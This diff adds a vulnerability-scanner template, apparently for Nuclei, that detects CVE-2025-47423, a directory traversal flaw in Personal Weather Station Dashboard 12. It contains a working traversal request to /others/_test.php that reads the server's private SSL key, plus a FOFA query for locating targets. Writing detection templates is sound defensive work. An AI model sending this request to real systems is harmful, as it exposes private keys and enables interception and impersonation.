Create CVE-2025-47423.yaml

http/cves/2025/CVE-2025-47423.yaml

@@ -0,0 +1,56 @@
+id: CVE-2025-47423
+
+info:
+  name: Personal Weather Station Dashboard 12 - Directory Traversal
+  author: pussycat0x
+  severity: high
+  description: |
+    Personal Weather Station Dashboard 12_lts allows unauthenticated remote attackers to read arbitrary files via ../ directory traversal in the test parameter to /others/_test.php, as demonstrated by reading the server's private SSL key in cleartext.
+  reference:
+    - https://github.com/Haluka92/CVE-2025-47423
+    - https://pwsdashboard.com/
+    - https://github.com/nomi-sec/PoC-in-GitHub
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+    cvss-score: 5.8
+    cve-id: CVE-2025-47423
+    cwe-id: CWE-24
+    epss-score: 0.00253
+    epss-percentile: 0.48549
+  metadata:
+    fofa-query: title="PWS Dashboard"
+    max-request: 2
+  tags: cve,cve2025,lfi,pws,traversal
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "PWS Dashboard</title>"
+        internal: true
+
+  - raw:
+      - |
+        GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "BEGIN RSA PRIVATE KEY"
+          - "END RSA PRIVATE KEY"
+        condition: and
+
+      - type: status
+        status:
+          - 200